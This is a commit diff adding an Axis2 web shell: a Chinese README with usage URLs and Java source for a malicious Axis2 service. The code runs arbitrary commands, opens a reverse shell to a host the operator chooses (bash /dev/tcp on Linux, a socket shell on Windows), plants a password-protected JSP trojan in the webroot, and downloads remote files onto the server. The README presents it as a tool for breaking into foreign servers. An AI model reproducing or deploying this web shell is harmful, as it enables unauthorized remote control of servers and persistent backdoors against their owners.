add axis2web shell @Svti

other/Axis2Shell/README.md

@@ -0,0 +1,54 @@
+axis2
+=========
+
+axis2 web shell  
+author : Svti  
+url : https://github.com/Svti/Axis2Shell  
+
+使用介绍：  
+
+1、命令执行  
+http://1.1.1.1/services/config/exec?cmd=whoami   
+(不说了，执行命令。注意:xml换行没有处理好)  
+
+2、反弹shell  
+http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555   
+(Linux则使用bash反弹shell，Windows则会进行socket执行shell)  
+
+
+3、文件上传  
+http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp  
+(会把resource目录下面的one.txt 写成shell.jsp，注意：全路径，带*文件名)  
+
+
+4、文件下载  
+http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp  
+(会把这个URL的文件写成shell.jsp，注意：全路径，带*文件名)  
+
+
+5、class目录查看  
+http://1.1.1.1/services/config/getClassPath  
+(会显示当前class的路径，方便文件上传)  
+
+ps:  
+趁周末休息，看了几个国外的机器有 axis的 项目，特地去找了@园长的Cat.aar工具，发现真心不好使。  
+
+1、反弹shell 鸡肋，好多错误 ，ls / 都不行。   
+
+2、没有文件上传功能。这个对于一个渗透着来说很重要   
+
+于是自己写了个，希望大家喜欢。   
+
+源码已经上github https://github.com/Svti/Axis2Shell   
+
+
+aar 文件https://github.com/Svti/Axis2Shell/blob/master/config.aar也在github上面，还有什么问题，可以在下面评论   
+
+
+注意：   
+
+1、相同文件名的aar文件只能上传一次，虽说是remove Service了，服务器上面的还在。想要继续使用，请rename   
+
+2、默认的jsp一句话木马是/resource/one.txt，可以自己修改。默认密码是wooyun，发布版本里面放的是one.jsp，一向鄙视伸手党  
+3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件，当shell断开后会自动删除  
+

other/Axis2Shell/Utils.java

@@ -0,0 +1,132 @@
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.FileWriter;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.net.Socket;
+import java.net.URL;
+import java.net.URLConnection;
+
+public class Utils {
+	
+	static String os = System.getProperty("os.name").toLowerCase();
+
+	public static String exec(String cmd) {
+		String result="";
+		try {
+			if (cmd!=null&&cmd.trim().length()>0) {
+				if (os.startsWith("windows")) {
+					cmd="cmd.exe /c "+ cmd;
+				}else {
+					cmd="/bin/sh -c "+ cmd;
+				}
+				InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();
+				
+				int read=0;
+				while ((read=inputStream.read())!=-1) {
+					result+=(char)read;
+				}
+			}
+		} catch (Exception e) {
+			result=e.getMessage();
+		}
+		return result;
+	}
+	
+	public static String shell(String host, int port) {
+		
+		String result = "";
+		if (host != null && host.trim().length() > 0 && port > 0) {
+			try {
+				if (os.startsWith("linux")) {
+					
+					String name="wooyun.sh";
+					File file=new File(name);
+					
+					FileWriter writer=new FileWriter(file);
+					writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n");
+					writer.flush();
+					writer.close();
+					Runtime.getRuntime().exec("chmod u+x "+name);
+					Process process = Runtime.getRuntime().exec("bash "+name);
+					process.waitFor();
+					
+					file.delete();
+				} else {
+					Socket socket = new Socket(host, port);
+					OutputStream out = socket.getOutputStream();
+					InputStream in = socket.getInputStream();
+					out.write(("whoami:\t" + exec("whoami")).getBytes());
+					int a = 0;
+					byte[] b = new byte[4096];
+					while ((a = in.read(b)) != -1) {
+						out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
+					}
+				}
+			} catch (Exception e) {
+				result = e.getMessage();
+			}
+
+		} else {
+			result = "host and port are required";
+		}
+		
+		return result;
+	}
+	
+	public static String upload(String path) {
+		String result="";
+		try {
+			if (path!=null&&path.trim().length()>0) {
+				FileOutputStream fos=new FileOutputStream(new File(path));
+				InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt");
+				BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+				String temp = "";
+				while (reader.ready()) {
+					temp += reader.readLine() + "\n";
+				}
+				fos.write(temp.getBytes());
+				fos.flush();
+				fos.close();
+				result="Upload Success";
+			}else {
+				result="Path is required";
+			}
+		} catch (Exception e) {
+			result =e.getMessage();
+		}
+		return result;
+	}
+	
+	public static String download(String url, String path) {
+		String result="";
+		try {
+			
+			if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
+				URLConnection conn=new URL(url).openConnection();
+				conn.setReadTimeout(10*60*1000);
+				conn.setReadTimeout(10*60*1000);
+				InputStream inputStream=conn.getInputStream();
+				int read=0;
+				FileOutputStream fos=new FileOutputStream(new File(path));
+				while ((read=inputStream.read())!=-1) {
+					fos.write(read);
+				}
+				fos.flush();
+				fos.close();
+			}else {
+				result="Url and path are required";
+			}
+		} catch (Exception e) {
+			result =e.getMessage();
+		}
+		return result;
+	}
+
+	public static String getClassPath() {
+		return new Utils().getClass().getClassLoader().getResource("/").getPath();
+	}
+	
+}